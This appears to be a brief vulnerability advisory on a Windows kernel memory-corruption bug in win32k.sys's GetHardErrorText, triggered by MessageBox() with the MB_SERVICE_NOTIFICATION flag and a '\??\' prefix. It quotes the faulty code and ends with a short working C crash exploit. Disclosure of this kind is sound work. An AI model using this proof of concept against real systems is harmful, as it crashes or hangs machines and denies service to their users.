A message was published by NULL about vulnerability in Windows on
processing MessageBox() with MB_SERVICE_NOTIFICATION flag and
message/caption beginning with \??\. Vulnerability seems to be memory
corruption in kernel and causes system crash or hang after few
attempts. It seems to happen because message is logged to event log and
may point to some problem with event logs processing.
The problem is in win32k.sys' function GetHardErrorText, which tries to
prepare EXCEPTION data for event log, and seems to be some very old
debugging feature accidently left in production code since Windows 2000.
In Windows 2000 there is a peace of code like:
} else if ((asLocal.Length > 4) &&
!_strnicmp(asLocal.Buffer, "\\??\\", 4)) { strcpy( asLocal.Buffer,
asLocal.Buffer+4 );
Exploit:
#include <windows.h>
int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
{
MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}
